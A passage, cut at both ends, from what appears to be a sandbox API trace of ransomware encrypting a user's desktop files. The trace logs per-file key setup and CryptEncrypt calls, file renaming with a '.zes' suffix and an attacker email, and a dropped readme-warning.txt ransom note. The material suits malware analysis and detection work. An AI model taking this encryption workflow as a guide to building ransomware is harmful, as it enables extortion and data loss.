dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0134.565] GetProcessHeap () returned 0x520000 [0134.565] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.565] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.565] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffa28 | out: lpNewFilePointer=0x0) returned 1 [0134.565] WriteFile (in: hFile=0x120, lpBuffer=0x23ffa38*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x23ffa38*, lpNumberOfBytesWritten=0x23ffa08*=0x6, lpOverlapped=0x0) returned 1 [0134.566] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffa0c | out: phKey=0x23ffa0c*=0x546448) returned 1 [0134.566] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.566] GetProcessHeap () returned 0x520000 [0134.566] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.566] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ff9f0*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ff9f0*=0x40) returned 1 [0134.566] CryptDestroyKey (hKey=0x546448) returned 1 [0134.566] WriteFile (in: hFile=0x120, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ffa08*=0x40, lpOverlapped=0x0) returned 1 [0134.566] WriteFile (in: hFile=0x120, lpBuffer=0x23ffa10*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x23ffa10*, lpNumberOfBytesWritten=0x23ffa08*=0x4, lpOverlapped=0x0) returned 1 [0134.566] WriteFile (in: hFile=0x120, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffa08*=0x10, lpOverlapped=0x0) returned 1 [0134.566] WriteFile (in: hFile=0x120, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ffa08*=0x80, lpOverlapped=0x0) returned 1 [0134.566] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffa30 | out: lpNewFilePointer=0x0) returned 1 [0134.566] WriteFile (in: hFile=0x120, lpBuffer=0x23ffa20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x23ffa20*, lpNumberOfBytesWritten=0x23ffa08*=0x8, lpOverlapped=0x0) returned 1 [0134.566] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffa0c | out: phKey=0x23ffa0c*=0x546448) returned 1 [0134.566] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.566] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.566] ReadFile (in: hFile=0x120, lpBuffer=0x2140020, nNumberOfBytesToRead=0x75fa, lpNumberOfBytesRead=0x23ffa14, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffa14*=0x75fa, lpOverlapped=0x0) returned 1 [0134.566] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ff9f0*=0x7600, dwBufLen=0x7600 | out: pbData=0x2140020*, pdwDataLen=0x23ff9f0*=0x7600) returned 1 [0134.567] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.567] WriteFile (in: hFile=0x120, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x7600, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffa08*=0x7600, lpOverlapped=0x0) returned 1 [0134.567] CryptDestroyKey (hKey=0x546448) returned 1 [0134.567] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x76d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.567] SetEndOfFile (hFile=0x120) returned 1 [0134.569] GetProcessHeap () returned 0x520000 [0134.569] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.569] GetProcessHeap () returned 0x520000 [0134.569] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.569] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\WGs9eIzE7L6We.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\wgs9eize7l6we.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\WGs9eIzE7L6We.odt.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\wgs9eize7l6we.odt.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.569] CloseHandle (hObject=0x120) returned 1 [0134.569] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.569] FindNextFileW (in: hFindFile=0x53a568, lpFindFileData=0x23ffa98 | out: lpFindFileData=0x23ffa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcdc7610, ftCreationTime.dwHighDateTime=0x1d5d908, ftLastAccessTime.dwLowDateTime=0xafd07720, ftLastAccessTime.dwHighDateTime=0x1d5e319, ftLastWriteTime.dwLowDateTime=0xafd07720, ftLastWriteTime.dwHighDateTime=0x1d5e319, nFileSizeHigh=0x0, nFileSizeLow=0x3f53, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="wMPhdEkF8ANxaAg_NJ.mp3", cAlternateFileName="WMPHDE~1.MP3")) returned 1 [0134.570] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\wMPhdEkF8ANxaAg_NJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\wmphdekf8anxaag_nj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0134.570] GetProcessHeap () returned 0x520000 [0134.570] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.570] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.570] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffa28 | out: lpNewFilePointer=0x0) returned 1 [0134.570] WriteFile (in: hFile=0x120, lpBuffer=0x23ffa38*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x23ffa38*, lpNumberOfBytesWritten=0x23ffa08*=0xd, lpOverlapped=0x0) returned 1 [0134.571] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffa0c | out: phKey=0x23ffa0c*=0x546448) returned 1 [0134.571] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.571] GetProcessHeap () returned 0x520000 [0134.571] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.571] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ff9f0*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ff9f0*=0x50) returned 1 [0134.571] CryptDestroyKey (hKey=0x546448) returned 1 [0134.571] WriteFile (in: hFile=0x120, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ffa08*=0x50, lpOverlapped=0x0) returned 1 [0134.571] WriteFile (in: hFile=0x120, lpBuffer=0x23ffa10*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x23ffa10*, lpNumberOfBytesWritten=0x23ffa08*=0x4, lpOverlapped=0x0) returned 1 [0134.571] WriteFile (in: hFile=0x120, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffa08*=0x10, lpOverlapped=0x0) returned 1 [0134.571] WriteFile (in: hFile=0x120, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ffa08*=0x80, lpOverlapped=0x0) returned 1 [0134.572] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffa30 | out: lpNewFilePointer=0x0) returned 1 [0134.572] WriteFile (in: hFile=0x120, lpBuffer=0x23ffa20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x23ffa20*, lpNumberOfBytesWritten=0x23ffa08*=0x8, lpOverlapped=0x0) returned 1 [0134.572] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffa0c | out: phKey=0x23ffa0c*=0x546448) returned 1 [0134.572] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.572] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.572] ReadFile (in: hFile=0x120, lpBuffer=0x2140020, nNumberOfBytesToRead=0x3f53, lpNumberOfBytesRead=0x23ffa14, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffa14*=0x3f53, lpOverlapped=0x0) returned 1 [0134.573] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ff9f0*=0x3f60, dwBufLen=0x3f60 | out: pbData=0x2140020*, pdwDataLen=0x23ff9f0*=0x3f60) returned 1 [0134.573] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.573] WriteFile (in: hFile=0x120, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x3f60, lpNumberOfBytesWritten=0x23ffa08, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffa08*=0x3f60, lpOverlapped=0x0) returned 1 [0134.582] CryptDestroyKey (hKey=0x546448) returned 1 [0134.582] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x4044, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.582] SetEndOfFile (hFile=0x120) returned 1 [0134.584] GetProcessHeap () returned 0x520000 [0134.584] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.584] GetProcessHeap () returned 0x520000 [0134.584] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.584] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\wMPhdEkF8ANxaAg_NJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\wmphdekf8anxaag_nj.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\wMPhdEkF8ANxaAg_NJ.mp3.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\wmphdekf8anxaag_nj.mp3.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.585] CloseHandle (hObject=0x120) returned 1 [0134.585] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.585] FindNextFileW (in: hFindFile=0x53a568, lpFindFileData=0x23ffa98 | out: lpFindFileData=0x23ffa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcdc7610, ftCreationTime.dwHighDateTime=0x1d5d908, ftLastAccessTime.dwLowDateTime=0xafd07720, ftLastAccessTime.dwHighDateTime=0x1d5e319, ftLastWriteTime.dwLowDateTime=0xafd07720, ftLastWriteTime.dwHighDateTime=0x1d5e319, nFileSizeHigh=0x0, nFileSizeLow=0x3f53, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="wMPhdEkF8ANxaAg_NJ.mp3", cAlternateFileName="WMPHDE~1.MP3")) returned 0 [0134.585] GetProcessHeap () returned 0x520000 [0134.585] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.585] CryptImportKey (in: hProv=0x534c10, pbData=0x23ff9f8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546448) returned 1 [0134.585] CryptDecrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588, pdwDataLen=0x23ffa60 | out: pbData=0x535588, pdwDataLen=0x23ffa60) returned 1 [0134.585] CryptDestroyKey (hKey=0x546448) returned 1 [0134.585] GetProcessHeap () returned 0x520000 [0134.585] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x5355d0 [0134.585] CryptImportKey (in: hProv=0x534c10, pbData=0x23ff9f8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546448) returned 1 [0134.585] CryptDecrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5355d0, pdwDataLen=0x23ffa60 | out: pbData=0x5355d0, pdwDataLen=0x23ffa60) returned 1 [0134.585] CryptDestroyKey (hKey=0x546448) returned 1 [0134.585] GetProcessHeap () returned 0x520000 [0134.585] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6e0) returned 0x5699d8 [0134.585] CryptImportKey (in: hProv=0x534c10, pbData=0x23ff9f8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546448) returned 1 [0134.585] CryptDecrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5699d8, pdwDataLen=0x23ffa60 | out: pbData=0x5699d8, pdwDataLen=0x23ffa60) returned 1 [0134.585] CryptDestroyKey (hKey=0x546448) returned 1 [0134.586] wsprintfW (in: param_1=0x23fea3c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\readme-warning.txt") returned 75 [0134.586] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\readme-warning.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\readme-warning.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0134.586] WriteFile (in: hFile=0x120, lpBuffer=0x5699d8*, nNumberOfBytesToWrite=0x6c5, lpNumberOfBytesWritten=0x23fea38, lpOverlapped=0x0 | out: lpBuffer=0x5699d8*, lpNumberOfBytesWritten=0x23fea38*=0x6c5, lpOverlapped=0x0) returned 1 [0134.587] CloseHandle (hObject=0x120) returned 1 [0134.587] GetProcessHeap () returned 0x520000 [0134.587] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5699d8 | out: hHeap=0x520000) returned 1 [0134.587] GetProcessHeap () returned 0x520000 [0134.587] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5355d0 | out: hHeap=0x520000) returned 1 [0134.587] GetProcessHeap () returned 0x520000 [0134.587] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.587] FindClose (in: hFindFile=0x53a568 | out: hFindFile=0x53a568) returned 1 [0134.587] GetProcessHeap () returned 0x520000 [0134.587] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x569748 | out: hHeap=0x520000) returned 1 [0134.587] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.587] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36fb1a60, ftCreationTime.dwHighDateTime=0x1d5de7a, ftLastAccessTime.dwLowDateTime=0x78a29120, ftLastAccessTime.dwHighDateTime=0x1d5e4ae, ftLastWriteTime.dwLowDateTime=0x78a29120, ftLastWriteTime.dwHighDateTime=0x1d5e4ae, nFileSizeHigh=0x0, nFileSizeLow=0x17e2d, dwReserved0=0x0, dwReserved1=0xffff, cFileName="ybEXHNZftujEdotm.mp4", cAlternateFileName="YBEXHN~1.MP4")) returned 1 [0134.587] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ybEXHNZftujEdotm.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ybexhnzftujedotm.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.587] GetProcessHeap () returned 0x520000 [0134.588] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.588] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.588] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.588] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0x3, lpOverlapped=0x0) returned 1 [0134.588] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x546448) returned 1 [0134.588] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.589] GetProcessHeap () returned 0x520000 [0134.589] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.589] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50) returned 1 [0134.589] CryptDestroyKey (hKey=0x546448) returned 1 [0134.589] WriteFile (in: hFile=0x124, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ffc90*=0x50, lpOverlapped=0x0) returned 1 [0134.589] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.589] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.589] WriteFile (in: hFile=0x124, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.589] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.589] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.589] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x546448) returned 1 [0134.589] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.589] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.589] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x17e2d, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x17e2d, lpOverlapped=0x0) returned 1 [0134.590] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x17e30, dwBufLen=0x17e30 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x17e30) returned 1 [0134.591] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.591] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x17e30, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x17e30, lpOverlapped=0x0) returned 1 [0134.591] CryptDestroyKey (hKey=0x546448) returned 1 [0134.591] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x17f14, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.591] SetEndOfFile (hFile=0x124) returned 1 [0134.594] GetProcessHeap () returned 0x520000 [0134.594] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.594] GetProcessHeap () returned 0x520000 [0134.594] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.594] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ybEXHNZftujEdotm.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ybexhnzftujedotm.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ybEXHNZftujEdotm.mp4.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ybexhnzftujedotm.mp4.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.597] CloseHandle (hObject=0x124) returned 1 [0134.597] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.598] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69abf600, ftCreationTime.dwHighDateTime=0x1d66ceb, ftLastAccessTime.dwLowDateTime=0x6a448c80, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0x23529900, ftLastWriteTime.dwHighDateTime=0x1d66ce3, nFileSizeHigh=0x0, nFileSizeLow=0xaa00, dwReserved0=0x0, dwReserved1=0xffff, cFileName="zes.exe", cAlternateFileName="")) returned 1 [0134.598] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d2096e0, ftCreationTime.dwHighDateTime=0x1d5e817, ftLastAccessTime.dwLowDateTime=0xb87a3260, ftLastAccessTime.dwHighDateTime=0x1d5e6db, ftLastWriteTime.dwLowDateTime=0xb87a3260, ftLastWriteTime.dwHighDateTime=0x1d5e6db, nFileSizeHigh=0x0, nFileSizeLow=0x10903, dwReserved0=0x0, dwReserved1=0xffff, cFileName="zgyGh8GT0arDFn7.mkv", cAlternateFileName="ZGYGH8~1.MKV")) returned 1 [0134.598] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zgyGh8GT0arDFn7.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zgygh8gt0ardfn7.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.598] GetProcessHeap () returned 0x520000 [0134.598] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.598] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.598] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.598] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0xd, lpOverlapped=0x0) returned 1 [0134.599] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x546448) returned 1 [0134.599] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.599] GetProcessHeap () returned 0x520000 [0134.599] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.599] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50) returned 1 [0134.599] CryptDestroyKey (hKey=0x546448) returned 1 [0134.599] WriteFile (in: hFile=0x124, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ffc90*=0x50, lpOverlapped=0x0) returned 1 [0134.599] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.600] WriteFile (in: hFile=0x124, 